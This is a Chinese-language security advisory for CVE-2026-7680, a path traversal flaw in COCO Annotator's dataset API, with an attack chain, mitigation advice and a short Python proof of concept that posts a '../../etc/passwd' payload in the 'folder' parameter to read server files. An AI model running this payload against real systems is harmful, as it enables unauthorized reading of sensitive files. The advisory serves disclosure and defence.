IPBUF安全漏洞报告
English
CVE-2026-7680 CVSS 4.3 中危

CVE-2026-7680: COCO Annotator路径遍历漏洞

披露日期: 2026-05-03

漏洞信息

漏洞编号
CVE-2026-7680
漏洞类型
路径遍历
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
jsbroks COCO Annotator

相关标签

路径遍历COCO AnnotatorCVE-2026-7680CWE-22信息泄露

漏洞概述

jsbroks COCO Annotator 0.11.1及之前版本被发现存在安全漏洞。问题出在Data Endpoint组件的`backend/webserver/api/datasets.py`文件中。由于未正确处理用户输入,攻击者可通过操纵`folder`参数发起路径遍历攻击。该漏洞利用难度低且无需用户交互,可远程进行,已有公开利用代码,可能导致服务器敏感文件被读取,目前厂商尚未修复。

技术细节

该漏洞的根源在于COCO Annotator后端API在处理数据集文件夹请求时,未对传入的`folder`参数进行严格的路径校验或清洗。攻击者可以通过发送特制的HTTP请求,在`folder`参数中包含路径遍历序列(如`../`),从而绕过预期的目录限制。受影响的文件`backend/webserver/api/datasets.py`在拼接路径时直接使用了用户可控的输入,导致攻击者可以访问Web根目录之外的文件系统资源。由于CVSS向量显示攻击复杂度低(AC:L)且无需用户交互(UI:N),攻击者只需构造包含`../../../../etc/passwd`或类似路径的Payload即可读取系统敏感文件。虽然CVSS评分目前仅影响机密性(C:L),但在某些服务器配置下,读取配置文件可能导致进一步的提权或数据库连接信息泄露。

攻击链分析

STEP 1
信息收集
攻击者识别出目标服务器上运行着jsbroks COCO Annotator应用,并定位到API端点。
STEP 2
构造攻击载荷
攻击者构造包含路径遍历字符(如../)的HTTP请求,修改`folder`参数以指向系统敏感文件。
STEP 3
发送恶意请求
攻击者向`backend/webserver/api/datasets.py`接口发送特制的POST请求。
STEP 4
获取敏感信息
服务器由于未过滤输入,返回了请求的文件内容(如/etc/passwd),导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration target_url = "http://target-ip:port/api/datasets" # Malicious payload with path traversal sequence # Attempting to access /etc/passwd payload = { "folder": "/../../../../../../etc/passwd" } try: # Sending POST request to the vulnerable endpoint response = requests.post(target_url, data=payload) # Check response status if response.status_code == 200: print("[+] Potential successful exploitation detected.") print("[+] Response content:") print(response.text) else: print("[-] Exploit failed or target is not vulnerable.") print(f"[-] Status Code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

jsbroks COCO Annotator <= 0.11.1

防御指南

临时缓解措施
建议立即检查系统日志是否存在异常访问记录。在代码层面,修改`backend/webserver/api/datasets.py`文件,引入`os.path.abspath`解析路径,并使用`os.path.commonprefix`确保解析后的路径仍在预期的数据集根目录下。如果无法立即修补代码,请配置WAF规则拦截包含`../`或`%2e%2e/`的请求,或暂时关闭受影响的数据集API功能。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表